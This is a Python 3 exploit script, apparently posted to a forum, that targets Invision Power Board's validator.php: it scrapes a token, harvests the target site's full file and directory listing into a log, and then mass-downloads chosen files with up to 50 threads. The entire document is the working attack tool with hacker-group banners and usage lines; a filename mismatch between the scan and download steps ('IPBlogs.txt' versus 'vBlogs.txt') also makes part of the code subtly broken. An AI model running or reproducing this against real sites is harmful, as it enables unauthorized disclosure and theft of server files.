Código:
#! /usr/bin/env python3.1
################################################################
# _____ _____ ____ (validator.php) #
# |_ _| __ \| _ \ #
# | | | |__) | |_) | #
# | | | ___/| _ < #
# _| |_| | | |_) | #
# |_____|_| |____/ #
# @expl0it... #
################################################################
# [ IPB Files / Directories Full Disclosure ] #
# [ Vuln discovered by TinKode / xpl0it written by cmiN ] #
# [ Greetz: insecurity.ro, darkc0de.com ] #
################################################################
# #
# Special thanks for: cmiN #
# www.TinKode.BayWords.com #
################################################################
import os, sys, urllib.request, urllib.parse, threading
def main():
logo = """
\t |---------------------------------------------------------------|
\t | _____ _____ ____ (TM) |
\t | |_ _| __ \| _ \ |
\t | | | | |__) | |_) | |
\t | | | | ___/| _ < |
\t | _| |_| | | |_) | |
\t | |_____|_| |____/ |
\t | |
\t | |
\t | IPB Full Disclosure expl0it |
\t | Written by cmiN |
\t | Vulnerability discovered by TinKode |
\t | |
\t | |
\t | Visit: www.insecurity.ro & www.darkc0de.com |
\t |---------------------------------------------------------------|
"""
usage = """
|---------------------------------------------------------------|
|Usage: ipbfd.py scan http://www.site.com/IPB_folder |
| ipbfd.py download *.zip -> all |
| ipbfd.py download name.jpg -> one |
|---------------------------------------------------------------|"""
if sys.platform in ("linux", "linux2"):
clearing = "clear"
else:
clearing = "cls"
os.system(clearing)
print(logo)
args = sys.argv
if len(args) == 3:
try:
print("Please wait...")
if args[1] == "scan":
extract_parse_save(args[2].strip("/"))
elif args[1] == "download":
download_data(args[2])
except Exception as message:
print("An error occurred: {}".format(message))
except:
print("Unknown error.")
else:
print("Ready!")
else:
print(usage)
input()
def extract_parse_save(url):
print("[+]Extracting content...")
hurl = url + "/validator.php"
with urllib.request.urlopen(hurl) as usock:
source = usock.read().decode()
print("[+]Finding token...")
word = "validate('"
index = source.find(word)
if index != -1:
source = source[index + len(word):]
value = source[:source.index("'")]
hurl = url + "/validator.php?op={}".format(value)
else:
print("[!]Token not found.")
print("[+]Obtaining paths...")
with urllib.request.urlopen(hurl) as usock:
lastk, lastv = None, None
dictionary = dict()
for line in usock:
line = line.decode()
index = line.find("<td>")
if index != -1:
lastk = line[index + 4:line.index("</td>")].strip(" ").strip(" ")
index = line.find("<strong>")
if index != -1:
lastv = line[index + 8:line.index("</strong>")].strip(" ")
if lastk != None and lastv != None:
index = lastk.rfind(".")
if index in (-1, 0):
lastk = "[other] {}".format(lastk)
else:
lastk = "[{}] {}".format(lastk[index + 1:], lastk)
dictionary[lastk] = lastv
lastk, lastv = None, None
print("[+]Organizing and saving paths...")
with open("IPBlogs.txt", "w") as fout:
fout.write(url + "\n")
keys = sorted(dictionary.keys())
for key in keys:
fout.write("{} ({})\n".format(key, dictionary[key]))
def download_data(files):
print("[+]Searching and downloading files...")
mthreads = 50
with open("vBlogs.txt", "r") as fin:
url = fin.readline().strip("\n").strip("/")
if files.find("*") == -1:
hurl = url + "/" + files.strip("/")
Download(hurl).start()
else:
ext = files[files.rindex(".") + 1:]
for line in fin:
pieces = line.strip("\n").split(" ")
if pieces[0].count(ext) == 1:
upath = pieces[1]
hurl = url + "/" + upath.strip("/")
while threading.active_count() > mthreads:
pass
Download(hurl).start()
while threading.active_count() > 1:
pass
class Download(threading.Thread):
def __init__(self, url):
threading.Thread.__init__(self)
self.url = url
def run(self):
try:
with urllib.request.urlopen(self.url) as usock:
data = usock.read()
uparser = urllib.parse.urlparse(usock.geturl())
pieces = uparser.path.split("/")
fname = pieces[len(pieces) - 1]
with open(fname, "wb") as fout:
fout.write(data)
except:
pass
if __name__ == "__main__":
main()
You must have python 3.1 to work!